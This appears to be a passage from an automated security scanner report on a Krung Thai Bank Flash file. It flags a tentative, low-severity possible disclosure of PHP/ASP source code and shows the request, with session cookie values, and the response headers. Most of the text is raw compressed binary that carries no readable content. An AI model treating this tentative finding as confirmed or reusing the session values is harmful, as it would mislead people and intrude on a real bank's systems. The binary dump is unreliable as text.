.........k.......    .<....B...RO.&..F.Kf.&..    .t..".fd.gdB._ .w.......JF....{.(.'B.....g....mI....axyYyU}....7..v.........g.M...@......5/.v...H.....a.....E.....?~..yx).|.@..s-.'....u.g....3.f6....$`.....Ol~...@y.....s......1.....a.......^noOlnk;.....D8N.u.:.\UzRN....`..X...A>~.X..0q...0....iS    .r..UU....`Wm..5.......B. ....w..y..k..q;.W....4|@.nb.....}...1z..~=....6x.Tiy...UA.j*t..k.))(i........ik...TZNYIQ..t...............H...AzUzGz...;...
.."J...B.....H......{7...=.s.kkr...rL.M...4..<q.=..c.s..........1##s...;..v...I.v..o..../*.......`...WZ..j...[z....>..*............t.9p.......it.9..y..M....@W...&..Q.SF..'q.....qL........Oqi.    z;..s..yW......|..]...V.".ZC......~..n.B...Bx..$;i..w^......|.*.....a~.JS.<..v.y36.j.....,/+...(..eo..%s..............(...z{.......9....#.......M.xC).m.....Y*.TJ.....3...T_.....JK..so........ii..4s.JK...............$...j..q.22.......G@HLT...D+..H(h..[.gll....FFf. .-l.0)...Lsvr.....+..)..hh..`.,.A6.N^...S6n".1..%%.%...Ey9[3...rw...._S3&,...Xk.._65..`.......G...wut.x.....................gOOO.<9zlp..x..yt5............".y.F.E..? .KO.?&.qt.....x...........07..>....w.g.k.....8Y.f'.G_...mN.K..8........Sd..l...7....i^Y^^ZB..w..yV...4j6&q...q.......qwwuvv..PI|......tpT.N.P..)W......H..f... ....<]..{i..A.WK[Gg.g....KHZ...m.sw...l.E../...pr.63!.f..T...|8.Y.....D...    .Y..$.q.X.....u.q{............./........RQa1iI)...:..Z..&.V4..........|(.....wdm..~}......]....&@xcss}M...........6....8p..........6..}...3..c..xf...K./.?wfz..u ....?q.G]O.#.)...'S......].L...R&.O.. .:K.......+.s(....{>..Z.......m.....l......_?........_....#.I.Ngrj...!.eG2...........`....E...xh..p..@....    .c#C.BB.0.........c.h773&.0...Z.....P..8...h...$.1.PR....%..*...^..703...w........I^........s...@p.;..Z..@..8..J.Pl..@g.............`....*..k...[X.......
'g.Ww.OO.7w..homn..,.../"...k..........GH....6n...5''g;Pza.....uk...g..,.......n."...vOe..}...F .....>....j....n....<08....{....cS......9........:..Xc...8....<........8..F(..l..1..=~B`N.w%..TN.9m..e...;5........'...........x...^o.7h..#."x.F..h
..18......i..o.......{1.......m...0_O....V...9.<.a..('.QV...J.9.|...rM..c.]EQ^QNNV..q:.qQCRJ.~...,....<..kj....\ii.@s.....p..uPon....?PC'..../.......d.*........8&.^a!nvN>.Q....2,.....2.*Z.P.[....ZX..9....=<.0....({k3..
".....2..z.z.+.5....GPD......2..n......-3u]...5qkR...T.........x.W.....{oM]#(......=P......1=s...........6?1.t.8.|........FOP....8..0...;~l....c.'.1?w...5j.....r....8...{{    2.......9
....y.......b.w..M....{Y....=P...2....].0'~PP..>x......+i.wuvt.9;.....[U.k.}ie..9.s.T..a=..'....
C?.@??./......s\....Pw..k..1d=Jv9...r..qA.R.Tp..Rq..d.R^Q.....
=.S<>.sru.....^..........6.
`~....}.    ..F..P.32|h...KH\L...G.........[PDDBF^]......r-.1...(w.....`J.w7gGk3}M.    1        1Qi%.}=-.e.JZ.V.~~A.    P.o.....O...).c.W..E....,.....WUQ.gO...].J.TTW..o.onn..?8...T......y......v.t.u.8r.....s./\.t........'....8.>
|~.W^N.?2..8e......._..vs.......O....g....^.].....%.a..].:=......a..}.O=..].......|hx.j..>..?..0f...{.;...).....ck.. ?w;.9.sM.@.%.&....2.e.I.>>n.4....-..8.E.l...#.....`3]V.~hNb.......X*!    x....Y&.LQ..].3.AdZ...{....E..IJ^..).o/....._.x.p~l...5A......,......$......Y98.A.3..r..    ..,U..7....CUc.('d...`.....`kf...$.TLDDt..............5..+<1.j.......eg.%F..Za.......}5{.TUUUVTWWW........mljjjni.....l.m@......G.......yOg..CG.'N..........?>
|..9..R@...>
...[SNIP]...

18.9. http://www.ktb.co.th/flash/ktb_group_eng.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/ktb_group_eng.swf

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /flash/ktb_group_eng.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/ktb_group/main.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094; visit_time=440

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:17 GMT
Content-length: 190580
Content-type: text/plain
Last-modified: Mon, 14 Mar 2011 02:36:46 GMT
Etag: "2e874-4d7d7f3e"
Accept-ranges: bytes

CWS    ....x..|y8.....1c...5..../c_..B.Y./.B.$d'Y...%..*..-...(.R.........o....z.W......s.~.s.3..Hg...`G(Z..@Z.?..S.!..q.. ..3...................-X34.-......uC...v...P.ap....vqw.'=].=.a.>G    Z.......
...[SNIP]...
<D.bH.+3.cycL.i.l......<%.C{....)\.4.4...=..I.....(.....t.... ......Q......_...J?.....8L._qg.'..W.._...9.J..w9...I.._X....._.".ge..y.:b.}.o......._G...\#......W.G..'./.....g...C..:...f.......w..E..nC..S...i...8Q.&...0.Q,p@.....X.......?..9....qqq.p    ......    ......\.FAq..................H..I)...)...../!..d....pQ.x.......a..!'P..A~G....B....|.Tu0..qp..    ...D..1.#I.4L4.tLt,.l\,.BAT$...r~,.-S
&.g......n3.\...LP..y.,.k....ms.a.O./..D......*r.Og.r..eC....<{t._.1.....J.....[.....6-..*.Z{..e.5./.....(k1....%.......(...(...EP.Y..n.. ..O.....W.]..Y....a....2"..........    ..........1~.I.@.e.B_?..+..._.n|K7...lr.$C.<.......Ocp-.&N'...........{.{m.:?..y...Y.i.z._G..m....G.==....\.... Wl6.B...X.@f_Ec.8.[...|..^...}.x.C....AM?A.7.....[...f......H`...1.T.........pU.D.cEm.....B._s.K..v.....^n...L.;*.%.....`...~.c..}...N.....kjR.a....7b.y.|..?....@.....*.@^..T..>..]..Z.!.Bq.....XY...2....c$..o....lg 2oF...K.u.O..I...._e.......0.{.:...    8....ZE.-...A........so.s..5.c....~.8{.O......5
.H .......ZQ...2.l......U.D.\.4..QC]..*DD..^........t-....$.*|&........6L.. $..?<..>..X.uV|.wH........oH...#...e(.........8gK.z.......x<...o.......^..j]9"U.......6...5W).,z.."V....|........L7....vPy`y.h."-.c...."..2@.AT.d...k..w..3p.z9...JOAy..+Nh..&.....0......'.....l.d.....:G.{EN.F..`..H....L...}?.        .3BC$}|B.W8-.}=...sm.s..c.r.KC.. K...u..a...q.`.j....Q.2.9..'...%..S.u.u^.*..vz:..G-.?K..9.LJ.m .%T.E...<.2...p.].Li..,..!...:(....>.
...>..p..d.j.=$..v........BlI..l......".....[g.....Aa;D'o.....6.h....q..>I..>s........(    )...    ..-C..9..Zn..z\rZ}..=.....f..!x~a/.    ......@......xV....T.x.x.>.....nZj....m...=..7.C@..!O...nm!.-.M.....e......T.2......e......J.G.....<.3.?|8.....a?t..W.//@$.}v.0.7.3.8&.+L.?.;.k........POu.;...)..._#.&....NN.    .,uunJo..H..a.,"...n.......9....^..Ma..q.>.d...@.7..m^.~.....*..).Ep]....4.5..1=..4.+.I..9.....!..d.Z|..V<t,.OY!.OY...|.......fC.......".r..8..Va(_b....L ...>.-...r~..!...k...._+^..8.%~_...f.l....=H....v.....<..&.....&:N$.s..%n..Tv.O\......RZ...^.^.1....S..h..>d9.p.@2..b.|_Yx...,..D!.;..
.8...,U.OS.fYR1........f.Q.......m...[..".6.$.v0Wd+.......-....xT....7z..~.....Y=.T.^.u?|s/....}M_.*.Y...R...m.L.......erajc...y...0........ob.../..l...d.....Fn....@...-...gKK#Y...[..#.;.x..{.Z...W.$MS......T~NR.H ....1...=._....$.'....Y!*./.x.(..2.z.T!*.......X9..u.....#.S...I.9BS...`.5.    u.....0..tU..s...W...g..HtI..eY
..s..m.-W..?.y..
9.'I..w..K.U]...M...g....Wn.h*.4.......2X.6e...+.........4#.IN.~..C.l..)$PR..1..Pt*.J5........l.8...8...Yr._...>N....a..E..@.J.zd.H..X."V[.pE.,i.V..X..0.pzr.7F/@....r....>T......>U.]?.Y...M...8......t~a.W.V..T.#...}8...[..6........y...G..h.......hqq..._H0Nso....q?p......|W..Z...x....}....H.3......?VKN?eJ...j..:&..&.JN    ...4...Bs..q.^q..I...CM.Mhv..._#..K.......{.Y...`...G!.2..G...:..bB.9Z?.......A?Y..M...Xi.X.z,...#..cYq...e7....*.0..........A.\....Q.......!.......h..V.. Hjk..uk.>.(.w.j.7(...y.[..g.n.......<..8........o.X...}.s..J#9.;.$.bG.O!....E#F.b..$.l.8........v..w...sV..B|........M....\b}..oz..v$...b.+cI..X.jV|.v.}}e-.......t>.    ...E.7.......CE..}.F....-.WEb..;_W18.....i..5.EDv."BLgNuW..8....>...d.I.7...ogp......K.O^...ljF..:...+...J
a./......w.C..N.....3t.\u...\=.....n.vL%...].@..H.l..V.w.....=..)..g.%..2..K....[~.X6zq....4'.0.......B..Gj47~..^Fu..}H..C...*.QCU...~.C.~...Q..d.\.Za..rY..>$w}. y../.T.@*.7%.M*......5..^.x.....15e.V|    c...bO...@...n.l...0...;...j.......8.u..]*.......G...4.Z....[Bs...D}..ZFP.-..N...$sz.z....."...V.......o    .......c..14./..v.E.FA...&.x7......3.....a..i..q.....]...|.c.."..w...\ .o....,..-....#.W.4.L.b.H.v./$.Y.2...7....._..7....<Q..9C..$+k.yWC^IU.L..*..:8........]...z...8](.......L.]..i..;.JIN.....2M?.....y.5....^ 3....S......(.%J~....L...)...d.3^J..2.%_;..........,.....J>.........%.rw.D...(9.....%..d..n..(...S.[...(...eq.4.A..P2.....(Y..p    ..%..Kv.|.zV)Y.'....6....7..A 1FEK.....<...v.......OL.<..w.....eD5..?HD.G..._.../....-.j..34..t.Q:.O. ..j..tf    .P...\..G....HP.V....P../.Z...4.5..W9........x...h..;.V.n.].........3...SsKF.?o........w-.,.-.PW.G.e.....v..u.ut`.u..:.x....}.
....... ...0.;.L
....=*....T...m*.t.......k.z.......u.w.1..9...;.Z.X.>@.P...z....x..@.....9@.......C......g.......@0....o.d .....B......M@;......40...[..p.....F.F.v.......M.M.M
M.M....>.    .5.........`.H..h....
.*..........D[F.A;F.@'D.D.CgC.C.C.AWA..n.n.......=.=....g.R......................1.Y....+.g.?. .X.O.y.........k.0LlL
LFL.L    LEL.LsL'L?.7.o131K1.c.c....D`.a.bqa.c)a.aYcy`.`.b.c.`5bb.c.`ccSa.c.b+b.c?...~...;.....{.{....:....G.....'.'..3N.N..<.........<.....s.X.l.Z.>.E..<R<V<q<<.<O.0.T.J.n.y..|2|v|0.=.G..............0.....l    .    .    .....$....r.........f...........I.......e.5.M...S...+.[.C...K...7H.HXIdH..x.....t.............&.V.....Q...i....!.&k%[".!g#.#. I.B.@>K.A.L!KaN.."...b.....R...e0e.e.....+BW._yz%.J..i*.*6*%..TaT.TCT.W...\....j......h.I_...t-...........]..^v}.....Z....=u#..%...9M.M!..-:-'.]Zo.....}:z:..'t    ttk.T.......k...(...l.....V..0.0>f.g...u.......ot.8abg.az...4...,.l.....y...E...%.e...U...5.......M.-...m.......{....".....'....7.n..|w....S...3.....K.....W/7.7......0.!...;O..O^*^U...e..|,|.|.|.|.[....J.5.O.......G.S.\ Q`@.HP^.*X..-.%d).^hD.BXM8P........H...(...h..............6.
....E.]...7%x$.$.%.$.%-%S%g.L`S.G.........i..)..dF.Y.B:]zQ...#..2..o.v.]r.PV\.W......;Aw....t...M.3.[...o).+x+.+b).(F(.+.).+e)m).*.*W!T.Vy.2.....Z........C.U.A.L..P.....d.t.......J.Z....n.6...v..........p...|.Or..~..C.;....z|z.z........8......=.y0o(l.`8d.n....!....k.I.M..L.LtM.M.....L........e...W-.-.-.-.....V`.H.%k.u....&.f.V.....#.G....4.2...u.......W8.;.9|w.w|.....I..i'q...-g..t.4.#.rWJ...p.p......{....}...dO..vxrz..\...J...6...s....O_...~h~f~......y...g....u>..<......./.^....K.........@...W..l_u..|....d...|+86....M[.H|.2.*.+L$.}8v.C.P.$"3.,.+r6J-.4.1:(z/.8.5V(69.?.-n:^5.<.%!<.....`....$...I..,....~..L...|.....G.....>..`...,..OmN.K.J.N.N?.p......=K4++.6;,.=.-g......;..y<y......._..........~+.+.+f-N*.(    *E+.,.*.).../..P..V)QYR.[.Q}.:..JMX-~..Zd.W.~......_g...o.k......Q...I...Y.....R.*.Z.&.V...^.!.Q.).Y.%.U.-.]...........}....4.4.>.>.;.342l8<=b1.4.xt{.}.d......    ...I..OS7...E.k~...1.=3>k>.:.2...@.......$.T.,....`e~....Z.:.z...F...f.......6r......=..o.......'.AG..2ab..c.....8.<...i%B...i.D.k.G.8_.A...goL.....Y.......qppqp........\...........#...'"9[.!!.....!..}.G...@#..z.9.;.
..8.^..0.0......{P....=.(..1..q0P.t.4t.2L...9...6.)..3J...8W~.....2.bq~..*+............."...,\..fp.^.._..2ZN>..~............_1.W]..e.1E=....3.[F..n...m=_'dU....8...y....l.[9..>...jNlL\....%*.,-...N.".>.lQ~...|..]3.mA.!..T..........    ..yq.^....l"r....:.;)E.7.gw_F.._6Y._+E......//)...z......#X.s...U........}i..2...T...MK...5........
_.77.......8...h?-h..B....+.l.'.A.Vk......R*B{.o..AxGu>......#...{.U...'.)...]S)..
.P..........0A.....2}..,....L_9V..........b....5T.....Mv.O..g.n......!....O....[.*C...A..:..T.'I.a.I\.A.d....8I../..;..,P...:..u..pM.{.._.ty...._mNd..^@..){T.......B...>..&.S.:j..-...i.1..........%XA.:...0H..........L..& ."0dF?.:.2.1.....s...`'..'9.`..H...k...u+6E/..y....=..].....~0zk?g.<...r.B....E...............}    #v. {6W.....;t..|...IL$TT(..5.*.g...b.......7l..rB.[..".......v.5.x[..P........G.3dQcoH..6.R..!....Hz:(...\X..Z.U3_..)...V..........N;.M..U$.O.g.KR0J........_)....1..N`..s..!.Pi......ADN.K...FE..,.3.y...".8...    .V./Y._..#.T>eLUL....8..d....... .xa.6.).-.u.<...#H.Mr..s..........Y.K....3.1......|....5...wDs.,K...r..}. ...wj[.....6..I.=
+k..)..y.....ck..
...u...E,.<...d....
M.2..S.......Z5.....[.j.K.K.b..&U...    ...?..3..J..z.BR.n....C...<qSg.*$ w....H .    ..#.G.H`..J3..D...p..+H...........D#P.'.e........3....7...Y.o....#R..h'.u.\.....j.-..kK..tTz.H ..&.q.W.T...u.M.!{b....H ...U".......+...].qp<..&++.}O.P........4R".h.....g8......-....n/.F(R..h........M...^.C..:..^..W.........j......>.. ...v.No.j...8.....O.r........u..(/.f.....x.0%..`.....N..]M.Nfk.(4...+..HD..Y......i?3......GeR.;&......W..V....
...d....a.5....8...j....|}u./..d..ly..]..|.H5....z*v*..n..IWr.T\kNcj....=..c..8.|.i.U.z.}.f#q.Z.M...$.........f1..?..]..."..L.'..w...W..l}r....y."......>b8...!.m.....qU..u,.5=.4.6s.T.Q.'x..C..:."..|Xs.T......e......|0...A....s.H..Z...h3....`.H.._1}..Z.p.+..7...\.x....{....Tq<..M....Q.eZ(s.....S>.=...,.......D..AG.m._.\..sU........|!..0.Xc.<"...o.$w.+.......a..j..V.v.....W<(.b...{.gT.o..;|........U..]...
...M.....k..6.....7f./.....w.o.K.d..s[Oub.Z........x.{J...7...L....o..v[    .k1.B.. .....z..xs...|.x.q.M...!W..}..Z.3C.*r....+........]s......8..X
.;.dT
......8YZ.0HO3t..n.:.....A.,...|...Ei......E.......jr'.........c.
....i._......$.b...N........E>..uWGX3.......zh.+.i......T.A4...............;.O.x.h.&<.B........{..L?w.h.\...yWM)...\a#+.q..%...;..1.+.o...7g..}.)....u7.uT....A....M.2.d..-.z..+|....h...6......c2.3...;.Z...0.5...H4.c.H...../'Gc.0.    ..N;.(..B....Ob>FM..T...+...<B<.3.-.0..........D~/...o..~.j=...K..*.J..a4..}.....o...d?.E85..=........Ui...,..WY.5.    ..3%8Z$....S.c...S..:b...i.......?Y.......m.-..Kn....>...C......z...    s+;.G..Z......Lz.....6..{...$..ZT...(PSoni.M.h.....)b.q..g'..e.<.3o.....=EP..F.i.|..."....~!....|.....O.[T]W.:..`,.*L.f-,...G...Do...,..o}.z.....s
.xll.m.....Az...1.
.)..3........?=.s....y`.n........d".n.HjS)..//...Zji,...7...Y*Y..DY...XFf+...`.......'?.m...I.I...2............MJ.c:`.~.....1..S.....R...
I....y.. ..).    ...A$..(.B....T..$;.."....0.vm5..Th.t.0..r.L...q...+..`n..>.'...{..+n..m.s..I....(.-............M.e..M...7aJ.....C.........$.*..d!.....[....S        ...f..W...P`.Bu.]..Lp...C...5.T.....Z?N.l.E.mN.m.........O.rQ.n..OkjP.}6s.V#].4?.<$....!...yH....7    o.......8..p....H...N.C/.....l$....[..X9.i...T...SP..Dz.]..$.77.........z....U......Rgp.V    Pm.o....5....0...9K&).k..[2..~.QD....M....cxfd1..u."hW...d.x.j...........r$l...5.{.z.9|......6B=qs..N.W.W3y._..r.+....c.*......"...(.....;.;\...].]....x.D:,_.E7.Q...........kX..Y1..B..g.=.J.".....g.......1.....LM.#......]L............#.($ R'...s2.9-.QmvQ..R.~.......9..I.STo...A5.A.BJ......=.p....$D.A..g8?$H..%...wj..u..$IX..kl.&.u.7E...g...Ww.H.1.C...=........NH..M.    .....im.1.....l.&    .W.8......x....TjB}.......v\.....S.tR..p<h...0.8...m$.-.J....*....Usj".{S..c....\._X;A.X..&..........#..x.....y.am.N.=.w....I.V......;S..Q-%t.H@.n`....H.^../w./..X'Q.yI.|n.}.bb....S.)..S.l..w[....+1...LX\4.]6..........t.6..w.wE.}N>._.Q/...u.d.../.hm.D`T.?T.T...........I.M.V......V.V.....$.Ai....).]...0.XF.WA...F..[..t..q..V..h+?.%....\'...P..!.
"..p../.E.E..u.....J}.NpVQ.@.....ic#\..E..[....*#......Bw..&....}..+v.G.B....1XC.+..Du...T..np.S{.{...L.ph]..P..u....#..\.....Q..t:e..D.t.w...N*...D..e..g......!........%.x!.B. .'.P!.n,$.O..._..9.s.A..3.+.T...FAy..<....=.....#.....>'..G.:.7W....n..j
hl..C.q.".4..6W..8W......h,..=..K].....w._....9J...i.'.....K..u....f9.}..]gr.i
...q....W .....j.P......q..|d......>.).2f..+..E...s.BU.5........@`..ITJ..J...Tx..J..>.......q.b)..Pp.g.s>T............\....I...hjm.ba..k......$...4..`C.M._k$..Q.c{.5z.3x,9.._8\...^.{_....3.7&.
..7.v.RE..f.7.Q........x..7e.I.OB.G...eE&....ux5..<..2"..F.....;.......c*....#.8b...iT.;{.nU...{v.w...<.*c. p..6.\..<\+lu.z...^z.Mt>.)...g~x.p^4    ........-....8U....(...b<...J......jo.'..7@......v....v.?....%I...WaU.....+\...~.....[dR.B...._..c9...;}..<.V}.....Z.QN..6..>...$..t..N\.9~Q.M...4.v.+...4._.p......y."..]P..j....#..$...>..&..?./Q;....8p......U.Vcn..x.nzb.X`...l.FRwb...........O......q.    !.:
#.l.=....R....w...?..8...0....%.HHu.Y....
.w....#v........)..3..72...U....*.t)....g......S..........<.;D..[...O.(3..Q'mu....k.5......k.).&x}.....+<..N.7h.n.QW..:..
;......n......P......t!4.V..tu.AMy......
.........|......`^....{..y;..,...k..SN31...R..Kl$d.d...K.b~..Y...JG.L%|u..hw2.w~9....{.k.F..).W..w..+.O/..&...Nn.*...9...w.MM..^p...5j&.G..Xb....9>*.;...0@T..3%...X...x.`P..S2    O].1/"/...Z.Ka.r.....hS.......'rQG.K....q..K.u.K.....L+_.....%...+r..3......t.z+(qk5..3....z"w..B.l\t..D....7.T...i.....{T...2}...d.^...B............0$.@.n.H}..1.3...'...h.|Q..|U............'6....9...P..O..y<.}.......E..H-...,........_.W}l..F.....|yA$.bjl..oXz....u.x:T.av....5......./6o....!^nZ...{..V..kN...{..8.gQ|    ....;.....{p....mq'....8...%..eqw.E|..w...w.{..................gcX...c..AJ..e......d..>.............1.v2..-..(...qt.....xa.sO....2.&....l........ |...0........YM.}.....@,A.;....N.-b.i_.u...~.._.G>..V...w.)H...b..O.W..>......`^n.|.Q{.d9..5n......1X..:.d........[X.,.B.sd`R....J....Z.".f.. h1...Tm..|xe..2:..|W|y...U?.p|.......q.l..@..h~Nt...*.g.J=.[n.b.
..K.....!.......]#Pa.#..o>.9L.!.v..@gy....~..>...u...^..gYk3........3...XWa5.g.....
7.N..x=!......-.g.H'x2..F.......P......MD.s.u.Y\..M{.4..#O7t..bV..M.7...q...l.. %.J....r.d}.i.P.._.{...6..b.o..>.......o.g...S...0..z..`..........Jo    .t*4|......5..?.p..|Q7fr.y+..k...).....eo.K.....r..u..2..[.....X.....G..s..6(^.z.T..qU.B$..u..f.K.x@.g...]............u.L...K...Au..J.....cClz...=vWX..........XY.j......#..9....V..W $.[j...!~I..^.l..#..X.....t...Cu...z.......}.S..7*.Q:....D...0.....w.=i..v.+.J..+:N...-+~B.Y5v...]...=,..1V.[ ...:.,n.[.Oz)e?....A......g.}..V.?...c.2...C=P V..G.1.Q).2>.8Q    ...lx.A...D....4..P.........+...R...    ...:    vl....<.8Lc.Z..!.$.C..8R..1.Zi~...y.........b.....Id]......;Vx.]"....[....G@"..V<}....s3...c..    P..f.%Qjl..X..c.......,.....J....
...9...gY....U.ge..K..v..........ud.....3..i. ..........j+..QtF.i`...6ZG.p...S_....G....Wa.'8..;.:....".....y......h..M...].\.U.zw.Y........b.Z...a.Z.'..:.....9qQ    ..G...N-U~.?..`M....+.s.,.a.U.{    ...4....=C..&. ..*........
X.....=..cv.._.Nd%._>...Q..F".w{....eG..|.r....HC../...X...2.G..i.VH|...........>....l.....6..!X(SP5..-..B...LY."......;vy..V....D...R......^Y.#0.(..o.A"pg.K'...A.^W...F.    ..r."y..5[........P+...#.p./&..h.{.=.6=.^vlU..4.b......s..f.'GL.3y..~. ...[L.m....k.K.>...F#y...Y..d....4u...2r.....~...52.    .......................;Bn(...3    (.Q.$..cp8.Z..I...k......'.D..Jy.dl.g....'.4D..>.V    .........#."q6.)[F.......+!...Z..9%....:."dY..i.z.........p..v..O.........h8.z.......+..k.......k.......&..$..m...K..+a.$VTS..r..p.|l..-{L-.xG...jy.\..]:......u.....&=.<...s.Ur..GQ.ee.-.D.El.C.K*.    >..........{........Xg.b.......Z....2}..zf..b..-..^.
...[..@'|.'.....Uj..;.h.....st.....d.bU.q.....x...w.......B.8.K.T.....7.h.X.5.!\.    )0...}*y......c.......Z............`."c.}+.+...h.)R.?.E..r[....td.B.R....|.>..y..pTn<.Q....:......ym._......}U...Mf..(.4"~`.oY....e..%...9=yw.`.-..]M.....j.$....O.N...pO...>T..].y.B...[...bi!....rS.SgX....N....._."(.....`    ....~.....T......!..B....o....DI?.$T-.'......?.t.
..._.^......V.......T....U.......o
.....?An.)B.!...e...+......}...HA"k{..    [...:...w<......P.....N..o..p..(..,...H..(H..o.P..!!!.b..0.c....bo....H((.....C}........D..}..x.z.C................M..    ........e....8./........S...&.....P^K._.....G@A..G...S.l.J..l.Tb*....(x....9....|O..$...PS.p
L...g...y.K\".%... .......... .#"...b..13@@z.....e....l8b*.....s.q....~...s6AMsN........a*.X......        ......H..,....T.>'Q...m..."meQ.[..u_(LJd...8C..C`Yr..C....]....q5..{..hr3.$....f..>.    .....\.U1Cz....1.o.3...8..8.w..aao.(P......3..3. R.qp.0@..{..*=..&[...K...y....,....L....R..i.;"7.k.j..;...o$.{.H...#A..e;j.;?....4....P......q.7L.nj....,.Z..{k......C.1TF.:qG.s...^....5...Yl.h.Gg..4.].>.........+..3.i...`..?..V.A...D+.|tr..J[/.B..8k8>.m........B.. 3...o..7_Do.R..n.....JG.
?e>!...I...k^.o.....Q.i=.p..+.....c.vs...@.!`kz..'.-..!.)..^@P).\.....'f...f.v!....E...f.....8..`...l3..oE@..._......o..V....}...r.k.nWT.    ...#..,..W..p..x%F.v.....w..6* ?.-....r|%.7/Y....].....DhsM..XJ...dB.(oP.2........<E...<[....v.bi6..2B.....h*.N.w..z....U.._.Q......^....:..N....D...?.k..... .)...t.....r...V.;...L.....}..C.<.".:.$.Z.#XB2l.....!.H........~.o.:...Y.bQI.6e;.....ePG.>....3...P...,...o...JBuuM... ...........b..J.pZ>.~..F&B...:........&i.#[.......x......SEY....u.. 5...s.......O...K..y..........{V.q.Q."......W.h....Su5.4....<8k.Xe.HSq.%l#y.u.Uc..x7.    ...$.|.T.8/..<2..>..=.{C..!zd.`U..~M'#+.xe.......j#z~..].....'~ga.Y^........[.c.4..%..HK...3..Tb...j..Y../.YT...L...G....&I...........q*.T..9hE......T.....~>...8..N..v}...ud]u.E!+o.\Wd.7.......!
..B.w.]].|..2g...R...FI...X.I>Q59.O.......\W!.^.3......sKn..un..<+...n..;o.@K......p....L..:.)..7.>.E...F.\...1.W.......}..1.D.\.x..=..5.....j8.k......MAm.-M    .l.....v...-x{.. .{N.......d.k..4......4..%..n.E..|.d.8...F5 .<.RS.........c'L.Ot6w.].......<...2..r..h........CN|P"....1....jS.{...,.Q...#l.....=X.T.......ZbYAd......Pa...9....|W....../....|1..<%d...$....y'f....Y._\.f.0.......EK.N.@9...P8Z|4..`..-.........6....#>F....&u#.....ss..6....8.f....t.'O.Q...../.&........:..P.3..z|.,....H....9m...Tl...=.......j.....u.....v.%.ek.5U.u....p..-...h.
5.|Z....>..h.N1.....q.d.n/....mxE.....p_......,G..{..M.k....u....>....Y......0...9!+    .C......$..X.I.Z.........Y.32.q...?..e......3]....j;:H....t.6.I.....r.g..#@p.!....7>f.73......<,.......H.yr.2.:...0uBM.q}..=iaZ........]...........+.m5P.W3.,/,....../+ .i....7.....].......cH.....02
.....$.....i.Qg>*;Z\....g...9TiL.R..cG...R....c$.$........*kL8..,o...jZ..`.1..a..O.....7e...........P+....lf..F...t.a....<........gf......>.%>
,..N...W...,..#.f...8.........a0.v.&u.....
..dC...Tz...,I.6s>
...[SNIP]...
<.    .=.
........:..#t...........s....4E..7.CWM.00r....5.z5...?.<?..{4........NV.S1........v/.|.......\O....Ij.t:..n/.)+.....ZO..8XvR..`.-:.c-..s...+.-..M.&A.-..~...N.E...eu.....VJ..b....H..w.?..nyft......6d........    ".#...e..^..49/...$......'m.[.].?.....l....2.s.k..r
r.j...........=..;........D.d.    ....Chn.\..j..K.w..m......n&wE..w..+.\..Z...
....~.].RS.M..H.*.\].S.....<h,D..?..&..'T..|"..O..+...-.....{&..5......v.?.....#|.........d....T.......&..=.2...vx.#.e............3nyS.2]:.5.2.)...B....1.3j...4...pQ[...,.%.....X...d...y...>*.3#...8-&.<U....n ...n....".S..:.K..2.<Bof0BK.c...........uw...Z.. ..P....V.........M..R..Q.E&...W...1.]........$...Qr*6bp
.    '.m....`.|.\.g..?_....~.5|...3V.a......wS...S.A6p.&...p>.=.b<.m9....j...4|ib......H\.V|Wq...w~.    ...Y_..u.............m.n.....o=..9.....x.......W%1b.>Jxd.c.\..C.2C.2Fyyy..2e{<........P.#.O...B!j..@.'...H.y.w..
..z...>...@^.iZ.w...#>3.E......35uQ..~.J<..).E~."d..O..._..^    ql._p..<
....xZ.mn....Y.k.....19.U.QlX.RV..3k./.l.k...Sd..2.sWB
...+HD0...F.....o.&........]b.. .....N...O....._.wu..%5.l3,.7..    i2...y.VR.......g
<.........u..+c
..D^....L..p..V.;...    ....e.....[.y..:5...[I..VM8B."0..mtN....P|,}.5.I....?....%...d..P.......V^.1.......~..w7,..;:D..5m'.D..4k8n.kp..{........=c.+dQ@.....\.......}.....d.....*.Z....L.$.a,.I.............,.8.K..k..+Y..DRO.Z..LAd..>........f8..o...>..bK..M4M.oa..:.q.....w.'.>1.....z.....r.......a............*M..T.F[...7...!q&...6`$F..H....l5r..@.....I..da..1B."..Z.8".v\...u_g.o.>..HI.
........{.~.
,.........$.v.\....w0.....i.Uu.;.......;.N..}.e...6..M3.E.
......"XZ.].4.A.s......Y^i..V....c~..}......%....*u...a......U..n-..U..T..XX^X`.:@k..']..ER......wU%.T....@B..s..p.}........T...I...9-..f.R.5.Z.Mu..V-.T.E.....(......5...;...v....g.[2.......q}....RO..R.q......iz.....nw.. ..f-}.)~9...40.=%.C.7...._..1.<.y.....V@..]l..|...L...l........E=&$A..x..[...\)-!......\.`..    uY.U.4...P.~&.G.......j._ei..K........s...;..j...R.1ab..j.F....=X..ZKf%.....?.......O........q^..0.^?.~.%.(.C..<......Ir.......$.j`.a[....T........#.x......2.....v...8...j...7...?..#.N.hH..E>....d."S.n..)K..n. .9"0....G..uii..1Y...I>..OD.R..D...KV.,@...>=....HIV.M1..w.$.Dn^=w.......:...............&..'..1..$..!.1.t}O.....;$...x..ME..i    .]*.,...U.......@.k<@<.fd.ufnh&......\.....u.N...B.f.D<,,..G.o.....O..O.2.?....>.5z-m.%..L..6M`9.7>..Yv..Y..,...Af4.....w.e...&..D>..X.b.....Zi.......{M.F..\.G[..Q.........9...Z|..*..m=ZW.I1$.p#.~.<..8..O4..-.H{c._v.lU........@.!.e$.....,.d.nYU..oq.$.{.h$...n|.......vA...F4p..@7.].F./.........\..\.V......z.]0...]j.....I.|.z...].R?.pwQ.V..UZYc;..$2....vXr..5%..l..    